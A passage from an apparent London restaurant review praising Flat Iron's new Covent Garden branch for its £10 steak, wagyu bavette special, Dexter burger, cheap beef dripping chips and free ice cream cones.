has plenty of great steak restaurants but unfortunately most of them are best visited when someone else is paying. But what if you want a tasty steak that won’t break the bank? Then enter Flat Iron, which has just opened its third restaurant, this time in Covent Garden.

Flat Iron is all about STEAK, and their signature cut sits in giant letters slap bang in the middle of the menu – and they are right to shout about it as it’s just £10. We also tried a cut from the specials board, a New Zealand wagyu bavette, at a still very reasonable £15, which was juicy and tender, and also the Dexter beef burger, pimped up with fresh horseradish cream. Beef dripping chips were spot on too, and at £2.50 an absolute steal by London standards.

Flat Iron has some great little touches too, such as the branded mini cleavers to cut your steak and the free, yes FREE, ice cream cone you get on the way out. If you’re looking for a great value dinner out, Flat Iron sets the steaks very high indeed.
